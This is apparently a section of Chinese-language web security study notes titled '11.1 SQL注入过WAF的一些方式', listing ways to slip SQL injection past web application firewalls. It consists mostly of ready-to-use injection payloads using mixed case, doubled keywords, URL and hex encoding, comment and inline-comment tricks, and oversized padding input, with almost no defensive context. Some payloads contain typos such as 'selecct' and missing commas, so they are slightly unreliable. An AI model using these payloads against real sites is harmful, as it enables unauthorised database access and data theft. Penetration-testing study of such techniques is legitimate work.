11.1 SQL注入过WAF的一些方式

SQL注入过WAF

WAF ：web应用防护系统，也叫web防火墙

过WAF基本功能：

1、大小写 select * from users where id =’1 ‘uNion SelEcT 1,2,3,4--+

2、替换关键字（关键字重复写） select*from users where ID=1 ununionion selselectect1,2,3,4%23

3、编码 select*from user where id=2%2bunion%2bselect%2b1,2,3,4--+

Union--->0x756e696f6e20

Select*from users where ID=1 %75nion select 1,2,3,4%23

4、注释符号 /**/  union/**/select/**/1,2,3%23

5、等价函数替换 version() @@version mid substr substring

6、特殊符号 select ‘version’();  @符号,select @......1.from users;
+  #  %23  --+   \\

7、内联注释加!  selecct*from users where id=1/*!union*//**//*!select*//**/1,2,3,4--+

 

 

分块传输过WAF

 

超长字符过WAF

 

有些WAF在接收到超长字符的时候没办法及时处理，会直接交付给后端（php环境），让其处理

 

8、缓冲区溢出
?id=1 and (select  1)=(select  0xA*1000)  uNiOn SeLeCt 1,2 version(),4,5database(),version(),8,9,10,11,12,13,14,15,16,17,18
（这里0xA的A重复1000次）